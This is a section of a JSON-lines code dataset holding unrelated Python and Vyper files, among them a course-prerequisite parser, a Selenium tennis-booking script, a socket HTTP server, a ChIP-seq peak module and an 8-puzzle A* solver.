concat(as_bytes32(_value), \"\")\n raw_log([keccak256(\"Approval(address,address,uint256)\"), as_bytes32(msg.sender), as_bytes32(_spender)], byte_value)\n return true\n\n@constant\ndef allowance(_owner : address, _spender : address) -> num256:\n return self.allowances[_owner][_spender]\n\n\n","sub_path":"examples/ERC20/ERC20.v.py","file_name":"ERC20.v.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"171984775","text":"#!/usr/bin/env python3\n#Tuan Phan Nguyen\n##All of the python functions used in the project\nfrom lxml import html\nfrom bs4 import BeautifulSoup\ndef get_course_prereq(line):\n \"\"\"\n Argument: line(string) of prerequisites\n Since the course name is not nicely formatted, this function just gets rid of the space between the name and the course number\n For example : \"CS 164 and CS 171\" => \"CS164 and CS171\"\n \"\"\"\n line_list = line.split()\n result = []\n is_course_name = False\n connect_word = {\"or\": 1, \"and\": 1, \",\":1, \"[Concurrently]\":1, \"(\":1, \")\":1}\n current_name = None\n #The idea here is that the course name always comes right before the course number, so if an element of the list is not a connect word, the first time we meet such an element it is the course name and the second time it is the course number\n #We essentially build up a new list here\n for i in range(len(line_list)):\n if line_list[i] not in connect_word:\n if current_name == None:\n current_name = line_list[i]\n else:\n result.append(current_name + line_list[i])\n else:\n current_name = None\n result.append(line_list[i])\n #Join the list, separated by spaces\n return ' '.join(result)\ndef pre_process_prereq(course_prereq):\n \"\"\"\n Argument: course_prereq (array list of prereq for the course)\n Since some prerequisite courses can be taken concurrently with the course, we can consider that to be True => get rid of that parenthesis\n We can get rid of that because the prerequisites will always write the Concurrent courses first.\n Return the list after getting rid of that part\n \"\"\"\n processed_input = course_prereq.split()\n if \"[Concurrently]\" in processed_input:\n idx = processed_input.index(\"[Concurrently]\")\n processed_input = processed_input[idx+1:]\n return processed_input\n\ndef is_eligible(course_prereq, taken_course):\n \"\"\"\n Arguments: course_prereq (array list of prereq for the course) and taken_course (dictionary for taken courses)\n The idea is that from the prereq array list, we can replace each taken course by \"1\", each course that has not been taken by \"0\", \"and\" by \"*\", \"or\" by \"+\" and do eval to calculate if the user has enough prereq to take that course\n For example: course_prereq = [\"MATH101\", \"or\", \"(\", \"CS164\", \"and\", \"CS171\", \")\"] and taken_course = {\"CS164\":1, \"MATH101\":1}\n After replacement, we will get the list [\"1\", \"+\", \"(\", \"1\", \"*\", \"0\", \")\"]. 
We can join this list to get a string and do eval on that\n Return True or False (whether the user has enough prerequisites to take the class)\n \"\"\"\n connect_word = {\"or\": '+', \"and\": '*', \",\":\"+\", \"(\":\"(\", \")\":\")\"}\n #Return True if there is no prereq\n if len(course_prereq) == 0 or course_prereq[0] == \"None\":\n return True\n for i in range(len(course_prereq)):\n #If the element in the list is not in the connect_word dictionary => This is a class => look it up and replace it with 0 or 1 properly\n if course_prereq[i] not in connect_word:\n if course_prereq[i] in taken_course:\n course_prereq[i] = \"1\"\n else:\n course_prereq[i] = \"0\"\n else:\n course_prereq[i] = connect_word[course_prereq[i]]\n #After replacement, join the list to get the string\n course_prereq_expression = \" \".join(course_prereq)\n #Try here to make sure we don't crash on really bad input; in all departments of Drexel, there are only 3 bad prerequisite inputs\n try:\n #This will evaluate that expression: if it is >= 1, the user has enough prerequisites for the class; if it is 0, the user does not have enough prereq\n if eval(course_prereq_expression) >= 1:\n return True\n else:\n return False\n except:\n return False\ndef get_page(resp):\n \"\"\"\n Argument: The object containing information about the GET request\n The function will get the text of the file and write it to the page_text file line by line\n \"\"\"\n txt = resp.text\n soup = BeautifulSoup(txt, \"html.parser\")\n text_page = [soup.getText()]\n page_txt = open(\"page_text\", 'w')\n for line in text_page:\n line = line.strip()\n page_txt.write(line+\"\\n\")\n page_txt.close()\ndef get_courses_have_prereq(resp):\n \"\"\"\n Argument: The object containing information about the GET request\n The function will first get the titles of the courses in the department\n Then, it will extract which courses have prereqs and write them to the prereq file\n \"\"\"\n txt = resp.text\n soup = BeautifulSoup(txt, \"html.parser\")\n ##Get the title of each class in the p tag with the courseblocktitle class\n class_title = soup.findAll('p', {\"class\": \"courseblocktitle\"})\n prereq_file = open(\"prereq\", \"w\")\n list_course = []\n #Get the course title and append it to the list\n for course in class_title:\n tmp = course.getText()\n tmp = tmp.split(' ')\n ##Since the course title is formatted to be something like (CS\\xa0171), I replace the \\xa0 with an empty string to make it easier to work with\n course_name = tmp[0].replace(u'\\xa0', '')\n list_course.append([course_name, None])\n index = 0\n has_prereq = None\n #The bold tag is everything like this:\n #College/Department: College of Computing and Informatics\n #Repeat Status: Not repeatable for credit\n #Prerequisites: (The course has this row only if it has a prereq)\n #From these tags, I can identify which courses have prerequisites and which do not\n bold_tag = soup.findAll('b')\n for i in bold_tag:\n text = i.getText()\n if text == \"College/Department:\":\n if has_prereq != None:\n list_course[index][1] = has_prereq\n index += 1\n has_prereq = False\n elif text == \"Prerequisites:\":\n has_prereq = True\n list_course[index][1] = has_prereq\n #From the list of course names and the list of True or False (whether a course has a prereq or not), write to the file the name of each course and whether it has a prereq or not\n for course, has_pre in list_course:\n course_has_pre = course + \" \" + str(has_pre) + \"\\n\"\n prereq_file.write(course_has_pre)\n 
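To make the substitute-and-eval idea in is_eligible concrete, a minimal self-contained sketch (hypothetical course names, not from the original project):

course_prereq = ["MATH101", "or", "(", "CS164", "and", "CS171", ")"]
taken_course = {"CS164": 1, "MATH101": 1}
ops = {"or": "+", "and": "*", ",": "+", "(": "(", ")": ")"}
# courses become "1" if taken, "0" otherwise; connectors become arithmetic operators
tokens = [ops[t] if t in ops else ("1" if t in taken_course else "0") for t in course_prereq]
print(eval(" ".join(tokens)) >= 1)  # "1 + ( 1 * 0 )" evaluates to 1, so True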
prereq_file.close()\n","sub_path":"src/get_prereq_project.py","file_name":"get_prereq_project.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"186540388","text":"import tensorflow as tf\nimport numpy as np\nfrom lecture_data import dataset_tr,dataset_te\nfrom network.data_process import final_data,final_labels,scaled_data_test\nimport psutil\n\n\nloaded_model = tf.keras.models.load_model('model2.h5py',compile=True)\n\n\nprint(scaled_data_test[0:1].shape)\npred = loaded_model.predict(scaled_data_test[0:1])# it works, honestly what a pleasure\nprint(pred)\n\n\"\"\"\nloaded_model.compile(\n loss=\"categorical_crossentropy\",\n optimizer=\"adam\",\n metrics=[\"accuracy\"])\nloaded_model.evaluate(final_data,final_labels)# it works fine\n\"\"\"\n\ni=0\nwhile(i<100):\n freq_cpu = 0\n while(freq_cpu==0):\n freq_cpu=psutil.cpu_percent()\n temp_cpu = 50\n svmem = psutil.virtual_memory()[2]\n memory_used = svmem\n bytes_sent = psutil.net_io_counters().bytes_sent\n bytes_recv = psutil.net_io_counters().bytes_recv\n #count the running processes\n nbre_process = 0\n\n for j in psutil.process_iter():\n nbre_process = nbre_process+1\n\n sondes = np.array([float(freq_cpu),float(memory_used),float(bytes_sent),float(bytes_recv),float(nbre_process),float(temp_cpu)])\n sondes = np.reshape(sondes,-1,6)\n sondes = sondes.astype(np.float32)\n scaled_sondes = (sondes-sondes.mean())/sondes.std()\n scaled_sondes = np.expand_dims(scaled_sondes,axis=0)\n scaled_sondes = np.expand_dims(scaled_sondes,axis=1)\n\n print(scaled_sondes)\n print(scaled_sondes.shape)\n i=int(i)+1\n pred = loaded_model.predict(scaled_sondes)\n print(pred)\n","sub_path":"load_model_evaluate.py","file_name":"load_model_evaluate.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"249198741","text":"\"\"\"\n Given a positive integer n, you can do operations as follows:\n\n If n is even, replace n with n/2.\n If n is odd, you can replace n with either n + 1 or n - 1.\n\nWhat is the minimum number of replacements needed for n to become 1?\n\nExample 1:\n\nInput:\n8\n\nOutput:\n3\n\nExplanation:\n8 -> 4 -> 2 -> 1\n\nExample 2:\n\nInput:\n7\n\nOutput:\n4\n\nExplanation:\n7 -> 8 -> 4 -> 2 -> 1\nor\n7 -> 6 -> 3 -> 2 -> 1\n\n\"\"\"\n\n#BFS\n\nclass Solution(object):\n def integerReplacement(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n\n pool = {n}\n moves = 0\n while pool:\n newX = set()\n for x in pool:\n if x == 1: return moves\n if (x % 2):\n newX.add(x + 1)\n newX.add(x - 1)\n else:\n newX.add(x // 2)\n pool |= newX\n moves += 1\n","sub_path":"integerReplacement.py","file_name":"integerReplacement.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"200901331","text":"# project aims to pull the price-to-book statistic of companies,\n# sort through the data to select values above a certain threshold, and\n# plot or try to make a financially useful graph\n\n\nimport time\nimport urllib.request\nimport pandas as pd\n\n\nsp500short = ['a', 'aa', 'aapl', 'abbv', 'abc', 'abt', 'ace', 'aci', 'acn', 'act', 'adbe', 'adi', 'adm', 'adp', 'cgm']\n\ndef yahooKeyStats(stock):\n try:\n sourceCode = urllib.request.urlopen('http://ca.finance.yahoo.com/d/quotes.csv?s=' + stock + '&f=p6').read().decode()\n #urllib.request.urlretrieve(sourceCode, 'quote.csv')\n\n #reported_pb = 
pd.read_csv('quote.csv', header=None)\n\n pbr = sourceCode.partition('Price/Book '\n '(mrq)'\n ''\n '')[1].partition('')[0]\n pbr=pbr[2][4]\n print('price to book ratio', pbr)\n except Exception as e:\n print('failed in the main loop', str(e))\n\nyahooKeyStats('aapl')\n","sub_path":"Sendtex_practice/investingscript_pratice.py","file_name":"investingscript_pratice.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"285526939","text":"from sklearn.metrics import roc_auc_score\r\n\r\ndef calculate_statistics(predicted,actual):\r\n \"\"\" Calculate statistics on how a predicted distribution diverges from actual\r\n Predicted is a 0-1 array, and so is actual\r\n len(predicted) = len(actual) \"\"\"\r\n\r\n num_samples = len(predicted)\r\n\r\n accuracy = 0\r\n tp = fp = tn = fn = 0\r\n\r\n for i in range(num_samples):\r\n if predicted[i] == actual[i]:\r\n accuracy+=1\r\n if predicted[i] == 1:\r\n tp+=1\r\n else:\r\n tn+=1\r\n else:\r\n if predicted[i] == 1:\r\n fp+=1\r\n else:\r\n fn+=1\r\n\r\n accuracy/=num_samples\r\n precision = 1\r\n if(tp+fp!=0):\r\n precision = tp/(tp+fp)\r\n\r\n recall = 0\r\n if(tp+fn!=0):\r\n recall = tp/(tp+fn)\r\n\r\n if precision+recall != 0:\r\n f1 = 2*precision*recall/(precision+recall)\r\n else:\r\n f1 = 0\r\n\r\n f5 = 0\r\n if precision+recall != 0:\r\n f5 = (1+0.25) * precision*recall/(0.25*precision+recall)\r\n\r\n if tp+fn != 0 and tn+fp != 0:\r\n balanced_accuracy = ((tp/(tp+fn)) + (tn/(tn+fp))) /2\r\n\r\n try:\r\n auc = roc_auc_score(actual,predicted)\r\n except:\r\n auc = 0\r\n\r\n return {'precision':precision,'recall':recall,'accuracy':accuracy,'auc':auc,'f1':f1,'f_0.5':f5}\r\n","sub_path":"src/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"100970915","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\n\r\ndriver = webdriver.Chrome('C:/Users/simon/Python/chromedriver')\r\ndriver.get(\"https://tennis.paris.fr/tennis/jsp/site/Portal.jsp?page=tennis&view=start\")\r\nconnect_button = driver.find_element_by_id(\"button_suivi_inscription\")\r\nconnect_button.click()\r\n\r\n#Log in to the website / A pop up appears\r\nparentWindow = driver.current_window_handle\r\nhandles = driver.window_handles\r\nfor windowHandle in handles :\r\n if (windowHandle != parentWindow):\r\n driver.switch_to_window(windowHandle);\r\n username_field = driver.find_element_by_id(\"username-login\")\r\n username_field.send_keys(\"XXX\") #Replace XXX by your email address\r\n password_field = driver.find_element_by_id(\"password-login\")\r\n password_field.send_keys(\"XXX\") #Replace XXX by your password\r\n driver.find_element_by_xpath(\"//*[@id='form-login-account']/div/div[1]/div[2]/div[1]/button\").click() \r\n driver.switch_to_window(parentWindow)\r\n\r\n#Login done, we go back to the website\r\ndriver.get(\"https://tennis.paris.fr/tennis/jsp/site/Portal.jsp?page=recherche&view=recherche_creneau#!\")\r\n\r\n#We input the name of the tennis court we are interested in\r\ntennisname_field = driver.find_element_by_xpath(\"//*[@id='whereToken']/li/input\")\r\ntennisname_field.send_keys(\"XXX\") #Replace XXX by the name of the tennis court you are interested 
in\r\ntime.sleep(1)\r\ntennisname_field.send_keys(Keys.ARROW_DOWN)\r\ntime.sleep(1)\r\ntennisname_field.send_keys(Keys.ENTER)\r\n\r\n#We input the time we are interested in\r\ndate_field = driver.find_element_by_xpath(\"//*[@id='when']\")\r\ndate_field.click()\r\ntime.sleep(1)\r\ndate_field = driver.find_element_by_xpath(\"//form[@id='search_form']/div[2]/div/div/div/div[7]/div/div[2]\")\r\ndate_field.click()\r\ndriver.find_element_by_xpath(\"//button[@id='rechercher']\").click()\r\ndriver.find_element_by_css_selector(\"#headLaFalu\\E8re21h > .panel-title\").click() #This element needs to be changed if the tennis is not \"La Faluère\"\r\ntime.sleep(1)\r\ndriver.find_element_by_css_selector(\"#collapseLaFalu\\E8re21h .row:nth-child(1) .btn\").click() #This element needs to be changed if the tennis is not \"La Faluère\"\r\n\r\n\r\nnom_field = driver.find_element_by_xpath(\"//*[@id='listPlayers']/div/div[1]/div/input\")\r\nnom_field.send_keys(\"XXX\") #Optional : replace XXX with the last name of your tennis partner\r\nprenom_field = driver.find_element_by_xpath(\"//*[@id='listPlayers']/div/div[2]/div/input\")\r\nprenom_field.send_keys(\"XXX\") #Optional : replace XXX with the first name of your tennis partner\r\ndriver.find_element_by_xpath(\"//*[@id='listPlayers']/div/div[3]/div/input\").click()\r\ndriver.find_element_by_xpath(\"//*[@id='submitControle']\").click()\r\n\r\ndriver.find_element_by_xpath(\"/html/body/div[1]/div[2]/div/div/table/tbody/tr[2]/td\").click()\r\ndriver.find_element_by_xpath(\"//*[@id='submit']\").click()","sub_path":"reservation.py","file_name":"reservation.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"313498172","text":"import gensim\nimport os\nfrom pyvi import ViTokenizer\nfrom gensim.models.callbacks import CallbackAny2Vec\nimport string\nimport time\nimport sys\n\nsys.path.append('../../../')\nimport TV_Utility\n\nclass MyDocuments:\n def __init__(self, dirname, ext_filter=['.txt'], encoding='utf-8', language='vi', is_remove_stopword=True):\n self.__dirname = dirname\n self.__ext_filter = ext_filter\n self.__encoding = encoding\n self.__language = language\n self.__is_remove_stopword = is_remove_stopword\n\n\n def __iter__(self):\n \"\"\" Yield each doc and its tags in the dataset at train time\n Returns:\n words (list of str): tokens in a document\n [tag] (list of int): list of tags assigned to the document\n \"\"\"\n path_tags = self.__get_file_paths_and_tags(self.__dirname)\n for (fpath, tag) in path_tags.items():\n if not os.path.splitext(fpath)[-1] in self.__ext_filter:\n continue\n try:\n words = []\n for line in open(fpath, encoding=self.__encoding):\n if len(line) == 0:\n continue\n line = TV_Utility.pre_process_sentence([line], language=self.__language, is_remove_stopword=self.__is_remove_stopword)[0]\n tokens = ViTokenizer.tokenize(line).split()\n words = words + tokens\n yield gensim.models.doc2vec.TaggedDocument(words, [tag])\n except Exception as e:\n print(e, fpath)\n\n def __get_file_paths_and_tags(self, root):\n \"\"\" Get all file paths in a folder and assign each path a unique number\n Args:\n root (str): location of root folder\n Returns:\n path_tags (dict of path:id): list of all file paths in the {root} folder\n and their IDs\n \"\"\"\n def __get_file(__root, __path_tags, __tag):\n for fname in os.listdir(__root):\n full_path = os.path.join(__root, fname)\n if os.path.isdir(full_path):\n __path_tags, __tag = __get_file(full_path, __path_tags, 
__tag)\n else:\n __path_tags[full_path] = __tag\n __tag += 1\n return __path_tags, __tag\n\n tag = 0\n path_tags = {}\n path_tags, tag = __get_file(root, path_tags, tag)\n return path_tags\n\nclass EpochLogger(CallbackAny2Vec):\n '''Callback to log information about training'''\n\n def __init__(self):\n self.epoch = 0\n\n def on_epoch_begin(self, model):\n self.__start = time.time()\n print(\"Epoch #{} start\".format(self.epoch))\n\n def on_epoch_end(self, model):\n t = time.time() - self.__start\n print(\"Epoch #{} end\".format(self.epoch))\n print(\"Time = \", t)\n self.epoch += 1\n\nif __name__ == '__main__':\n MyDocuments('../../../')","sub_path":"Nlp_Model/Model/Doc2Vec/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"346416847","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nmanorm.peak\n~~~~~~~~~~~\n\nThis module contains classes and functions for peak-related operations.\n\"\"\"\n\nfrom __future__ import absolute_import, division\n\nimport logging\nimport os\nfrom math import exp, log\n\nfrom manorm.compat import filter, range\nfrom manorm.exceptions import UnsupportedFormatError\nfrom manorm.peak.parsers import BEDParser, BEDSummitParser, MACS2Parser, MACSParser, NarrowPeakParser\n\nlogger = logging.getLogger(__name__)\n\nPEAK_FORMATS = ['bed', 'bed-summit', 'macs', 'macs2', 'narrowpeak', 'broadpeak']\nPEAK_PARSERS = {'bed': BEDParser, 'bed-summit': BEDSummitParser, 'macs': MACSParser, 'macs2': MACS2Parser,\n 'narrowpeak': NarrowPeakParser}\n\n\nclass Peak(object):\n \"\"\"Class for a single peak.\"\"\"\n\n def __init__(self, chrom, start, end, summit=None):\n \"\"\"Initialize a peak.\n\n :param chrom: The chromosome name of the peak.\n :param start: The start coordinate of the peak (0-based).\n :param end: The end coordinate of the peak (0-based).\n :param summit: The summit coordinate of the peak (0-based).\n \"\"\"\n self.chrom = chrom\n self.start = int(start)\n self.end = int(end)\n if summit is not None:\n self.summit = int(summit)\n else:\n self.summit = (self.start + self.end) // 2\n if not self.start <= self.summit <= self.end:\n raise ValueError(\"peak start must be <= summit and < end, got start={}, summit={}, end={}\".format(\n self.start, self.summit, self.end))\n self.type = None\n self.summit_dis = None\n self.read_count1 = None\n self.read_count2 = None\n self.read_density1 = None\n self.read_density2 = None\n self.m_value = None\n self.a_value = None\n self.normed = False\n self.read_density1_normed = None\n self.read_density2_normed = None\n self.m_value_normed = None\n self.a_value_normed = None\n self.p_value = None\n\n def count_reads(self, reads1, reads2, window_size=2000):\n \"\"\"Count reads and calculate the read density.\"\"\"\n if window_size <= 0:\n raise ValueError(\"window size must be > 0\")\n extend = window_size // 2\n self.read_count1 = reads1.count(self.chrom, self.summit - extend, self.summit + extend) + 1 # add a pseudo 1\n self.read_count2 = reads2.count(self.chrom, self.summit - extend, self.summit + extend) + 1\n self.read_density1 = self.read_count1 * 1000 / (extend * 2)\n self.read_density2 = self.read_count2 * 1000 / (extend * 2)\n\n def cal_ma_value(self):\n \"\"\"Calculate the M value and A value based on read densities.\"\"\"\n self.m_value = log(self.read_density1, 2) - log(self.read_density2, 2)\n self.a_value = (log(self.read_density1, 2) + log(self.read_density2, 2)) / 2\n\n def normalize(self, ma_params):\n 
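A tiny worked example of the M/A definitions in cal_ma_value above, with made-up read densities (not from any real dataset):

from math import log
d1, d2 = 8.0, 2.0                   # hypothetical read densities
m = log(d1, 2) - log(d2, 2)         # M value (log2 fold change) = 2.0
a = (log(d1, 2) + log(d2, 2)) / 2   # A value (mean log2 intensity) = 2.0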
\"\"\"Normalize M value and A value by robust linear model.\n ma_model: y = ma_params[1] * x + ma_params[0]\n \"\"\"\n\n def _cal_p_value(x, y):\n \"\"\"Calculate P value with given read densities.\"\"\"\n\n def _log_factorial(n):\n num = 0\n for i in range(1, n + 1):\n num += log(i)\n return num\n\n if x < 0 or y < 0:\n raise ValueError(\"x and y must be >= 0\")\n x = int(round(x))\n if x == 0:\n x = 1\n y = int(round(y))\n if y == 0:\n y = 1\n # use the log-transform to calculate p-value\n log_p = _log_factorial(x + y) - _log_factorial(x) - _log_factorial(y) - (x + y + 1) * log(2)\n if log_p < -500:\n log_p = -500\n p_value = exp(log_p)\n return p_value\n\n self.m_value_normed = round(self.m_value - (ma_params[0] + ma_params[1] * self.a_value), 5)\n self.a_value_normed = round(self.a_value, 5)\n self.read_density1_normed = round(2 ** (self.a_value_normed + self.m_value_normed / 2), 5)\n self.read_density2_normed = round(2 ** (self.a_value_normed - self.m_value_normed / 2), 5)\n self.p_value = _cal_p_value(self.read_density1_normed, self.read_density2_normed)\n self.normed = True\n\n def __repr__(self):\n return \"Peak({}:{}-{})\".format(self.chrom, self.start, self.end)\n\n\nclass Peaks(object):\n \"\"\"Class for a collection of peaks.\n Peaks are stored by a dict under ``self.data`` with chromosome names as keys and lists of :class:`Peak` as values.\n \"\"\"\n\n def __init__(self, name=None):\n \"\"\"Initialize the peak set.\n\n :param name: The name of the peak set.\n \"\"\"\n self.name = name\n self.data = {}\n\n @property\n def chroms(self):\n \"\"\"Return the chromosome names of peaks.\"\"\"\n return list(self.data.keys())\n\n @property\n def size(self):\n \"\"\"Return the number of peaks.\"\"\"\n return sum(len(self.data[chrom]) for chrom in self.chroms)\n\n def add(self, peak):\n \"\"\"Add a peak.\n\n :param peak: An instance of :class:`Peak` to be added.\n \"\"\"\n if not isinstance(peak, Peak):\n raise ValueError(\"requires a 'Peak' object to be added into peaks\")\n else:\n self.data.setdefault(peak.chrom, [])\n self.data[peak.chrom].append(peak)\n\n def sort(self, by='start', ascending=True):\n \"\"\"Sort peaks.\n\n :param by: Attribute name to sort by. Defaults to ``'start'``.\n :param ascending: Sort ascending or descending. 
Defaults to ``True``.\n \"\"\"\n for chrom in self.chroms:\n self.data[chrom].sort(key=lambda x: getattr(x, by), reverse=not ascending)\n\n def fetch(self, chrom):\n \"\"\"Fetch peaks from specified chromosome.\n\n :param chrom: Chromosome name to fetch peaks from.\n \"\"\"\n if chrom in self.data:\n return self.data[chrom]\n else:\n return []\n\n @property\n def n_common(self):\n \"\"\"Return the number of common peaks.\"\"\"\n return sum(sum(1 for _ in filter(lambda x: x.type == 'common', self.fetch(chrom))) for chrom in self.chroms)\n\n @property\n def n_unique(self):\n \"\"\"Return the number of unique peaks.\"\"\"\n return sum(sum(1 for _ in filter(lambda x: x.type == 'unique', self.fetch(chrom))) for chrom in self.chroms)\n\n def __repr__(self):\n return \"Peaks(name={})\".format(self.name)\n\n\ndef load_peaks(path, format='bed', name=None):\n \"\"\"Read peaks from file.\n\n :param path: The file path to read peaks from.\n :param format: Format of peaks file.\n :param name: Name of peaks.\n \"\"\"\n logger.debug(\"Loading peaks from {}\".format(path))\n if name is None:\n name = os.path.splitext(os.path.basename(path))[0]\n peaks = Peaks(name=name)\n try:\n peak_parser = PEAK_PARSERS[format](path)\n except KeyError:\n raise UnsupportedFormatError(format=format)\n for chrom, start, end, summit in peak_parser.parse():\n peaks.add(Peak(chrom=chrom, start=start, end=end, summit=summit))\n peak_parser.close()\n peaks.sort()\n logger.debug(\"Loaded {} peaks\".format(peaks.size))\n return peaks\n","sub_path":"manorm/peak/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"67356654","text":"from socket import *\n\n\"\"\"\nThis example opens a socket that listens to localhost port 9000.\nIt can respond to 1 call and queue up another 4.\nIt continuously tries to accept incoming requests and blocks execution until it does.\nOnce it receives a request, it prints it and replies with encoded Hello World HTML\n\nAfter execution you may wish to kill a process if a resource is hanging.\nps -fA | grep python\nkill -9 \n\nIf you access this from a web browser, you'll get the favicon request.\nBut if you use a simple client where that request isn't baked in, you won't.\n\"\"\"\n\ndef createServer():\n server_socket = socket(AF_INET, SOCK_STREAM) #make socket to receive client message\n server_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) #hack to let server re-run without address\n try:\n server_socket.bind(('localhost', 9000)) #this program consumes port 9000\n server_socket.listen(5) #Queue 4 more calls if this socket is busy\n\n # keep serving many requests until execution is ended via error or interrupt\n while True:\n\n #this is a blocking call\n #code will NOT proceed any further until there is something to accept.\n client_socket, address = server_socket.accept()\n\n #after something has been accepted, proceed to parse, log and respond.\n request_data = client_socket.recv(5000).decode().split(\"\\n\")\n if len(request_data) > 0:\n for line in request_data:\n print(line)\n\n # construct response\n data = \"HTTP/1.1 200 OK\\r\\nContent-Type: text/html; charset=utf-8\\r\\n\\r\\n\"\n data += \"Hello World\\r\\n\\r\\n\"\n\n # send encoded response and shutdown connection.\n client_socket.sendall(data.encode())\n client_socket.shutdown(SHUT_WR)\n\n except KeyboardInterrupt:\n print(\"\\nShutting down..\\n\")\n\n except Exception as e:\n print(\"Error:\\n\")\n print(e)\n\n # cleanup the socket when function is closing.\n server_socket.close()\n\n#print convenient url to terminal\nprint('Access http://localhost:9000')\ncreateServer()\n","sub_path":"SimpleBrowserServerAndClient/2_simple_server.py","file_name":"2_simple_server.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"431777855","text":"#Program Code :\nfrom time import time\nfrom queue import PriorityQueue\nimport math\n#Creating a class Puzzle\nclass Puzzle:\n #Setting the goal state of 8-puzzle\n goal_state=[1,2,3,8,0,4,7,6,5]\n #Setting up the members of a class\n heuristic=None\n evaluation_function=None\n needs_hueristic=True\n num_of_instances=0\n #constructor to initialize the class members\n def __init__(self,state,parent,action,path_cost,needs_hueristic=False):\n self.parent=parent\n self.state=state\n self.action=action\n #TODO: calculate the path_cost as the sum of its parent cost and path_cost\n if parent:\n self.path_cost = parent.path_cost+path_cost\n else:\n self.path_cost = path_cost\n if needs_hueristic:\n self.needs_hueristic=True\n self.generate_heuristic()\n #TODO: calculate the expression as f = g + h\n self.evaluation_function=self.path_cost+self.heuristic\n #TODO: incrementing the number of instance by 1\n Puzzle.num_of_instances+=1\n \n #method used to display a state of 8-puzzle\n def __str__(self):\n return str(self.state[0:3])+'\\n'+str(self.state[3:6])+'\\n'+str(self.state[6:9])\n\n #method used to generate a heuristic value\n def generate_heuristic(self):\n self.heuristic=0\n for num in range(1,9):\n #TODO: calculate the heuristic value as the manhattan distance, i.e. the absolute \n \n #row and column differences between each tile's position in the current state and in the goal state. \n #Use index() method to get the index of num in each state\n cur_idx=self.state.index(num)\n goal_idx=self.goal_state.index(num)\n i=abs(int(cur_idx/3)-int(goal_idx/3))\n j=abs(int(cur_idx%3)-int(goal_idx%3))\n self.heuristic=self.heuristic+i+j\n\n def goal_test(self):\n #TODO: include a condition to compare the current state with the goal state\n if self.state == self.goal_state:\n return True\n return False\n\n @staticmethod\n def find_legal_actions(i,j):\n #find the legal actions as Up, Down, Left, Right based on each cell of state\n legal_action = ['U', 'D', 'L', 'R']\n if i == 0: # up is disabled\n # if row is 0 in board then up is disabled\n legal_action.remove('U')\n elif i == 2: \n legal_action.remove('D')\n if j == 0:\n legal_action.remove('L')\n elif j == 2:\n legal_action.remove('R')\n #TODO: return legal_action\n return legal_action\n\n #method to generate the child of the current state of the board\n def generate_child(self):\n #TODO: create an empty list\n children=[]\n x = self.state.index(0)\n #TODO: generate the row (i) & col (j) position based on the current index of 0 on the board \n i = int(x/3)\n j = int(x%3)\n #TODO: call the method to find the legal actions based on i and j values\n legal_actions=self.find_legal_actions(i,j);\n\n for action in legal_actions:\n new_state = self.state.copy()\n #if the legal action is UP\n if action == 'U':\n #Swapping between current index of 0 with its up element on the board\n new_state[x], new_state[x-3] = new_state[x-3], new_state[x]\n elif action == 'D':\n #TODO: Swapping between current index of 0 with its down element on the board\n new_state[x], new_state[x+3] = new_state[x+3], new_state[x]\n elif action == 'L':\n #TODO: Swapping between the current index of 0 with its left element on the board\n new_state[x], new_state[x-1] = 
new_state[x-1], new_state[x]\n elif action == 'R':\n #TODO: Swapping between the current index of 0 with its right element on the board\n new_state[x], new_state[x+1] = new_state[x+1], new_state[x]\n #TODO: Append the new_state of Puzzle object with parent, action,path_cost is 1, its needs_hueristic flag\n children.append(Puzzle(new_state,self,action,1,self.needs_hueristic ))\n \n #TODO: return the children\n return children\n \n #method to find the solution\n def find_solution(self):\n solution = []\n solution.append(self.action)\n path = self\n while path.parent != None:\n path = path.parent\n solution.append(path.action)\n solution = solution[:-1]\n solution.reverse()\n return solution\n#method for A-star search\n#TODO: pass the initial_state as parameter to the Astar_search method\ndef Astar_search(initial_state):\n count=0\n #TODO: create an empty list of explored nodes\n explored=[]\n #TODO: create an instance of Puzzle as initial_state, None, None, 0, True\n start_node=Puzzle(initial_state,None,None,0,True)\n q = PriorityQueue()\n #TODO: put a tuple with start_node.evaluation_function, count, start_node into PriorityQueue\n q.put((start_node.evaluation_function, count, start_node))\n\n while not q.empty():\n #TODO: get the current node of a queue. Use the get() method of Queue\n node=q.get() \n #TODO: extract the current node of a PriorityQueue based on the index of a tuple. \n #Refer a tuple format put in PriorityQueue \n node=node[2]\n #TODO: Append the state of node in the explored list as node.state\n explored.append(node.state)\n if node.goal_test():\n return node.find_solution()\n #TODO: call the generate_child method to generate the child node of current node\n children=node.generate_child()\n for child in children:\n if child.state not in explored:\n count += 1\n #TODO: put a tuple with child.evaluation_function, count, child into PriorityQueue\n q.put((child.evaluation_function,count, child))\n return\n#Start executing the 8-puzzle with setting up the initial state\n#Here we have considered 3 initial states initialized using the state variable\nstate=[[1, 0, 2,\n 6, 8, 4,\n 7, 3, 5],\n\n [2, 